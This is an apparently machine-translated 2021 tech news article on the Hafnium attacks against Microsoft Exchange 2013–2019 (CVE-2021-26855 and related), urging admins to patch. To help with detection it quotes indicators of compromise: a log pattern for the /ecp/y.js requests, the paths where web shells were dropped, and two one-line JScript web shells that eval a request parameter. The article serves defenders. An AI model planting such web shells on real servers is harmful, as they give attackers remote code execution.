Blocking ads removes funding from us!
Researching and writing articles takes a lot of time. Operating our infrastructure costs money.
All of this is funded with advertising revenue.
We don't like advertising either - that's why we avoid annoying banners and pop-ups.
Please give us a chance and deactivate your adblocker!
Alternatively, you can support us here voluntarily.

Follow us:


Microsoft Exchange Server with huge security gap: Update urgently!

Microsoft Exchange Server
Image: Microsoft
(Post picture: © 2021 Microsoft)

A few days ago Microsoft released an urgent update for a Microsoft Exchange Server security hole in version 2013, 2016 and 2019. Hackers are already exploiting the security gap on numerous servers. Company and customer admins should ideally update the popular mail server immediately, if they have not already done so.

Microsoft has closed security holes that a Chinese hacker group called "Hafnium" is currently alleged to be exploiting on a massive scale. The corresponding blog post from Microsoft speaks of several zero-day exploits. Specifically, it concerns CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065, which were patched on Wednesday. Currently, according to Microsoft, these are "limited targeted attacks" that could quickly be replaced by automatic bots. Therefore admins should act now urgently.

According to the Volexity These attacks could have been running since January 06, 2021, but have really started on Wednesday. In addition, a video demonstrates what the exploitation of the security gap looks like.

Microsoft Exchange Server Vulnerability: Who Is Affected?

Exchange 2013, Exchange 2016 and Exchange 2019, which have not applied the current patch, are affected. The company makes this available for all three versions for the last two CUs (except Exchange 2013). There is a patch for Exchange 2013 for CU23, at Exchange 2016 for CU18 and CU19 and at Exchange 2019 for CU7 and CU8. We have linked you to the download pages for the corresponding CUs. There are important information about the update here.

If no patch is available for the cumulative update used, you are forced to update. The patches are also rolled out via Windows Update, but probably only work with the versions mentioned. Incidentally, the CU version used can be as described here check via the Exchange Management Shell.

Analysis of CERT.at According to that, in Austria alone, there is a very high probability that over 4.000 Exchange servers are vulnerable. In Germany it should, according to the security search engine Shodan be over 57.000. Worldwide there are around 266.000 affected servers. The German Federal Office for Information Security (BSI) warns before the vulnerability and gives a red alert. The BSI also recommends “to check all systems that were not updated immediately on Wednesday night to see whether there was a commpronotification has come. To do this, Exchange systems must be checked for known web shells.”

Users who Office 365 (New: Microsoft 365) have nothing to worry about. Microsoft is already taking care of all necessary updates and security patches there.

Microsoft Exchange Server Vulnerability: Have I Been Attacked?

Difficult to say and it depends on the server. However, Microsoft lists in the blog post some indicators that can indicate an attack. The security experts at Rapid7 offer further technical analyzes of the attacks on their website. In most cases, however, you will find some POST requests for "/ecp/y.js" in the IIS ECP logs, carried out with various Python scripts:

"/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1"

Such a call does not necessarily have to indicate that data has already flowed out. When they attack, the hackers place webshells on the server, using which data - even after the patch has been installed! - can be extracted. on GitHub Microsoft provides a script that analyzes some of the attack methods in the logs and provides information about a possible attack.

In addition, according to the BSI, possible shells could be under

%PROGRAMFILES%\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\

as RedirSuiteServerProxy.aspx or below

C:\inetpub\wwwroot\aspnet_client\

have been filed. With this GitHub-Script from a developer can be checked for other webshells in the system. These shells often contain the following as ExternalUrl:

http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script>

or

http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["klk123456"],"unsafe");}</script>

To all admins who are reading this right now: Good luck with patching, keep calm & don't forget backups! Anyone who is still considering whether to apply the patches this weekend: yes, of course.

Recommendations for you

>> The best Amazon deals <

David Wurm

Do that TechnikNews-Ding together with a great team since 2015. Works in the background on the server infrastructure and is also responsible for everything editorial. Is fascinated by current technology and enjoys blogging about everything digital. In his free time he can often be found developing webs, taking photographs or making radio.

David has already written 962 articles and left 382 comments.

Development | Facebook | Twitter | Insta | YouTube | PayPal coffee donation
notification settings
notifications about
guest
Your name, which will be shown publicly.
We will not publish your email address.

0 Comments
Inline feedback
View all comments
Cookie Consent with Real Cookie Banner